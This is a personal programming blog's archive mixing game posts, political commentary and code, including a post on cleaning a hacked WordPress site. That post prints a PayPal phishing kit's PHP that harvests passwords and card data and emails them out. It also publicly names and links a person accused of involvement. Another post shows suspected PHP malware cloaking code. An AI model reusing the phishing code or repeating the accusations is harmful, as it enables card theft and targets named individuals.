diablo 3 monk gold farming tactic

June 2, 2012

Despite some previous objections, I have still been playing Diablo 3, more than I’d actually care to admit. After my first legendary drop sold for 2.85 million, I decided to use the fortune to invest in some gold find gear. I have been running Act 4 normal mode, and it usually takes about 40 minutes to complete, and nets around 55,000g. Here are the basics:

My Stats

91% gold find
49 yards pickup radius
8,500 dmg
3400 armor
23.5k life
2 x ~850 DPS weapons

Key Talents

Mystic Ally -> Air Ally (This allows the ally to break barrels, vases, etc. More gold!)
Mantra of Conviction -> Submission (Does 17% dmg to enemies within 20 yards, every second – or: about 800 damage with my current gear)
Fleet Footed & Chant of Resonance (Movement speed and extra duration on your mantras, respectively)

With these stats and the four key talents listed above, I can run through (literally, just running) Act 4 of Normal difficulty and never have to swing a weapon. I just collect gold. If you’re running this setup, I’d like to know your stats and other places to farm.

diablo 3 – DRM or not?

May 23, 2012

The more I think about the online-only requirement of Diablo 3, the more I realize that I don’t actually own the game. I’m basically leasing it from Blizzard. Shouldn’t I own software that I purchase, and by extension of that ownership, do as I please with it?

obama, china and cisco walk into a bar

May 9, 2012

On Monday April 23rd, “President Barack Obama announced Monday that he has signed an executive order allowing new sanctions against companies that enable Syria and Iran to use technology such as cell phone monitoring to carry out human rights abuses.”1

The hypocrisy here is astounding. American companies are (and have been) selling software and hardware to oppressive governments in record numbers. Reporters Without Borders has a list accurately titled, “Enemies of the internet” that is updated annually. Currently on that list:

Current suspected exporters of censorship hardware and software:
  • Nokia Siemens Networks
  • Ericsson
  • Secure Computing, recently acquired by Intel
  • Narus
  • Cisco
Additional reading:
It may make for convenient election-year postulating, but don’t be fooled – the current administration (or any before it, for that matter. Does NSA warrentless wiretapping ring any bells?) are quite happy overlooking human rights abuses in countries not currently in the media spotlight.

1 http://www.cnn.com/2012/04/23/politics/obama-human-rights/index.html

general miscellaneous update

May 8, 2012

I feel like I should post something, so here are a couple projects I’m working on.

 

LiiMS – Laboratory information management system built on Yii framework. Still in very early infancy.

Five Families: The Yellow Pages – I’ve been screwing around with The Godfather: Five Families on G+ lately and am releasing a program later that will allow players to find any other player on their server (As opposed to sifting through a 750×750 grid to find them). That will probably be posted on the site within a few weeks’ time.

first odesk job – wordpress hacked! update: comfort suites dickery

July 24, 2011

I love these freelance gigs! This client’s WordPress blog had been hacked multiple times, and despite reverting to numerous backups, the website always seemed to have phishing pages placed on it. There are a number of ways to go about fixing hacked websites, but if you don’t take care of the source of the problem, it’s just going to keep happening.

This particular phishing page was for PayPal France and was setup to capture personal information (For PayPal and otherwise) and credit card data and email it off to the perpetrators. Here’s the relevant code:

1
2
3
4
5
6
7
8
9
10
11
$subj = "Paypal [FR] Result | $paye | $ip"; // Subject
 
$msg = "+-----------------------[Dark-M - PayPal [FR] Result's]-----------------+\n +-----------------------------------------------------+ \n
Prenom : $pnom\n Nom: $nom\n +-----------------------------------------------------+\n Email: $email\n Password: $passw\n Question secret 1: $answer1\n
 Question secret 2: $answer2\n +-----------------------------------------------------+\n ligne d'adresse 1: $adress1\n ligne d'adresse 2: $adress2\n
 ville: $ville\n zip code: $zip\n Pays: $paye\n Telephone: $phone\n Date de naissance: $dob_b - $dob_a - $dob_c\n
+---------------------+ PayPal info +-------------------+\n type de carte : $credit_card\n numero de carte : $cc\n
Date d'expiration: $expdate_m / $expdate_y\n Cvv: $cvv\n Compte Bancaire: $cmpt_b\n Code d'Authentification : $codepe\n
 +--------------------------|Dark-M|---------------------------+\n IP Address : $ip\n"; // Do not modify
 
$to = "attioui.m@facebook.com,k5h@hotmail.fr,result@live.de,amarevisa@gmail.com" ; // Write your email

Clearly not the smartest people on Earth. That Facebook email belongs to this guy:  http://www.facebook.com/attioui.m and he looks like the kind of asshole that would leave his Facebook email as evidence of phishing.

In any case, once the phishing page was updated with a warning (and disabled), it was time to get things back in order. In this case, there were a number of plugins installed including All In One SEO Pack, which I believe is the culprit. I haven’t had time to properly audit the application, but there are a number of reports from other bloggers about their sites being hacked and running this plugin.

If you find yourself with a recurring hacked WordPress installation, do the following in this order:

  1. Change all passwords immediately.
  2. Disable and delete all plugins immediately.
  3. Hire someone that knows enough about WordPress and web application security to check the plugins you decided to install.

Plugins really are great, but it seems like they attract the lowest common denominator programmers. You have no idea who these people are, what their expertise is like and what the history of the plugin is. The plugin could have been made solely for the purpose of executing a shell under the correct conditions.

If you are a non-technical blogger that needs a solution, seriously consider getting yourself a professional. When someone installs poorly written plugins, they are exposing themselves and everyone else on that server to being hacked, defrauded and potentially embarrassed. It’s worth the time and money to do things the right way.

Mohamed Attioui

Mohamed Attioui

Update: After confronting the Facebook guy on Monday morning of July 25th about his involvement, he immediately changed his name to “Simo Attioui” and then blocked me from viewing his profile or messaging him. k5h@hotmail.fr also appears to be “Dark-M”, the person who wrote the page for gathering information. Here are a couple pages belonging to him: http://hidden-team.com/fourm/member.php?u=21 && http://www.dark-m.fr/

Update II: Monday afternoon (July 25), after having my debit card declined at lunch, I called my bank to find out why, despite having more than enough funds, I wasn’t able to pay for lunch. Apparently on July 21st, some random dickhead decided to use my stolen credit card at a Comfort Suites in Wisconsin. They only charged slightly over $8, and I disputed it and got my money back, but there were also 2 other attempts at purchasing something, which thankfully were both denied. What exactly can you buy at a Comfort Suites that costs $8? My guess is the person was attempting to make sure the card had a balance before going on a big shopping spree. Nobody really seems to concerned about this either, so I reckon I’ll do some investigating myself this week.

php malware

July 20, 2011

Last month someone passed me a php engine (malware? blackhat seo?) of sorts that I have been dissecting at home. It is strangely similar to another one I found last year on a client website. Here are few sections worth mentioning.

1
ob_start((isset($_0) ? 'A' . strtoupper(md5('rx_output')) : 'rx_output'));
1
2
3
4
5
6
7
8
function variable70()
  {
      global $_0, $_1, $_2, $_3;
      global ${ '_SERVER' };
      function25('HTTP/1.1 404 Not Found', true);
      echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL ' . $_SERVER['REQUEST_URI'] . ' was not found on this server.<P><P>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.<HR><ADDRESS>' . $_SERVER['SERVER_SIGNATURE'] . '</ADDRESS></BODY></HTML>';
      exit;
  }

I’m leaning towards malware, and here’s why: http://www.download-review.com/shop/search/?s=windows+7

work project

July 15, 2011

We had a work project come through this week, where the client needed some files parsed and their usual programmer is MIA. They sent us a number of data samples, and the MSSQL that the previous programmer used. Since we don’t operate with MSSQL, I took the old SQL and decided to write a few stored procedures; something I hadn’t done before. After an hour or two, I came up with this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
TRUNCATE TABLE tblReadDataWrk2
INSERT INTO tblReadDataWrk2
           ([ReadDateTime]
           ,[SiteID]
           ,[TagID]
           ,[ReadSeq]
           ,[ReaderID]
           ,[ReadStrength]
           ,[Motion])
SELECT [ReadDateTime]
      ,[SiteID]
      ,[TagID]
      ,[ReadSeq]
      ,[ReaderID]
      ,[ReadStrength]
      ,[Motion]
  FROM [AcuteTrack].[dbo].[tblReadDataWrk]
 
 
DECLARE @RowCnt INT
DECLARE @MaxRows INT
DECLARE @currentReadSeq INT
DECLARE @currentReadStrength SMALLINT
 
 
SELECT @RowCnt = 1
 
-- These next two rows are specific to source table or query
DECLARE @tblTempRead TABLE (rownum INT IDENTITY (1, 1) PRIMARY KEY NOT NULL , 
        ReadSeq INT,
        ReadStrength SMALLINT)
INSERT INTO @tblTempRead (ReadSeq, ReadStrength) SELECT ReadSeq, ReadStrength FROM tblReadDataWrk2
 
SELECT @MaxRows=COUNT(*) FROM @tblTempRead
 
while @RowCnt <= @MaxRows
BEGIN
 
    SELECT @currentReadSeq = ReadSeq, @currentReadStrength = ReadStrength FROM @tblTempRead WHERE rownum = @RowCnt
 
    IF EXISTS ( SELECT readseq FROM tblReadDataWrkNurse WHERE ( readseq > @currentReadSeq - 3 AND 
               readseq < @currentReadSeq + 3 ) AND ReadStrength >= @currentReadStrength )
               DELETE tblReadDataWrk2 WHERE readseq = @currentReadSeq 
 
    SELECT @RowCnt = @RowCnt + 1
END

Turned into:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
DROP PROCEDURE IF EXISTS step8;
DELIMITER //
CREATE PROCEDURE step8()
BEGIN
	SET @RowCnt = 1;
	SET @MaxRows = 0;
	SET @currentReadSeq = 0;
	SET @currentReadStrength = 0;
 
	CREATE TEMPORARY TABLE tblTempRead (rownum INT(11) NOT NULL AUTO_INCREMENT PRIMARY KEY, ReadSeq INT(11), ReadStrength SMALLINT);
	INSERT INTO tblTempRead (ReadSeq, ReadStrength) SELECT ReadSeq, ReadStrength FROM tblReadDataWrk2;
	select @MaxRows:=count(*) from tblTempRead;
 
	while @RowCnt <= @MaxRows do
 
		select @currentReadSeq:=ReadSeq, @currentReadStrength:=ReadStrength FROM tbltempread WHERE rownum = @RowCnt;
 
    		IF EXISTS ( SELECT ReadSeq FROM tblReadDataWrkNurse WHERE ( ReadSeq > @currentReadSeq - 3 AND ReadSeq < @currentReadSeq + 3 ) AND ReadStrength >= @currentReadStrength ) THEN
               		delete from tblReadDataWrk2 where ReadSeq = @currentReadSeq;
    		END IF;
 
    		SET @RowCnt = @RowCnt + 1;
	end while;
END//
DELIMITER ;
CALL step8();

There is one more step left; the MSSQL is about twice as large as this one. I may post it when I’m finished if it still feels like an accomplishment. I’m happy with how my first stored procedure turned out, but is there a better way?

mysql modified preorder tree traversal

July 13, 2011

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
<?php
/*
CREATE TABLE IF NOT EXISTS `categories` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_id` int(11) NOT NULL,
  `name` varchar(255) NOT NULL,
  `l` int(11) NOT NULL,
  `r` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=20 ;
 
--
-- Dumping data for table `categories`
--
 
INSERT INTO `categories` (`id`, `parent_id`, `name`, `l`, `r`) VALUES
(1, 0, 'Shop Public', 1, 38),
(2, 1, 'For Sale', 2, 35),
(3, 2, 'For Sale', 3, 14),
(4, 3, 'Appliances', 4, 5),
(5, 3, 'Barter', 6, 7),
(6, 3, 'Bikes', 8, 9),
(7, 3, 'Boats', 10, 11),
(8, 3, 'Books', 12, 13),
(9, 2, 'Real Estate', 15, 22),
(10, 2, 'Vehicles', 23, 34),
(11, 1, 'Community', 36, 37),
(12, 9, 'Single Family', 16, 17),
(13, 9, 'Condo', 18, 19),
(14, 9, 'Apartment', 20, 21),
(15, 10, 'Convertible', 24, 25),
(16, 10, 'Coupe', 26, 27),
(17, 10, 'SUV', 28, 29),
(18, 10, 'Truck', 30, 31),
(19, 10, 'Wagon', 32, 33);
*/
 
include('includes.php');
 
function rebuild_tree($parent, $left) 
{
	$right = $left + 1;
 
	$result = mysql_query('SELECT parent_id, id FROM categories WHERE parent_id = "'.$parent.'";'); 
	while ($row = mysql_fetch_array($result)) 
	{
		$right = rebuild_tree($row['id'], $right);
	}
 
	mysql_query('UPDATE categories SET l = '.$left.', r = '.$right.' WHERE id = "'.$parent.'";');
 
	return $right+1;
}
 
function display_tree($root) 
{
	$result = mysql_query('SELECT l, r FROM categories WHERE id = "'.$root.'";');
	$row = mysql_fetch_array($result);
 
	$right = array();
 
	$result = mysql_query('SELECT name, l, r, id FROM categories WHERE l BETWEEN '.$row['l'].' AND '.$row['r'].' ORDER BY l ASC;');
	while ($row = mysql_fetch_array($result)) 
	{
		if (count($right)>0) 
		{
			while ($right[count($right)-1] < $row['r']) 
			{
				array_pop($right);
			}
		}
 
		echo str_repeat('-',count($right)).$row['name']."<br />";
 
		$right[] = $row['r'];
	}
}
 
rebuild_tree(1, 1);
display_tree(3);
?>

acibind && System_Daemon PEAR class

July 12, 2011

featured-image

At “Real Work”, we have a nifty ongoing project that requires the use of RFID hardware. (Supplied via RF Code - http://www.rfcode.com/) The project tracks movements of personnel through small hospitals, and then sends that data to a central location. We needed something that could a) Run continuously b) Start & stop gracefully and c) interface with the rest of the system. I had my heart set on a cron job, but after messing with that over the course of a half-day, it became obvious that it wasn’t what we needed. The answer for this project was in a little PEAR class called System_Daemon (http://kevin.vanzonneveld.net/techblog/article/create_daemons_in_php/ - Find the code & examples here).

System_Daemon is fast, light-weight and does everything the daemon needs to do with ease. Every hospital where the hardware is installed connects to this single server, and there is a backend that was built to build reports of movement and time spent in locations. Unfortunately I can’t share acibind (Yes, I named my pet daemon) or the reporting mechanisms, but if you look at Kevin’s homepage you’ll get a basic idea of how it all comes together.

Compared to the old tracking equipment and reporting (Which used RFID signal strength as opposed to infra-red), the new system is about 200% more accurate in tracking assets and reporting, which saves these hospitals a lot of money every year. Looking forward to installing the equipment in more locations around the country and seeing the project grow.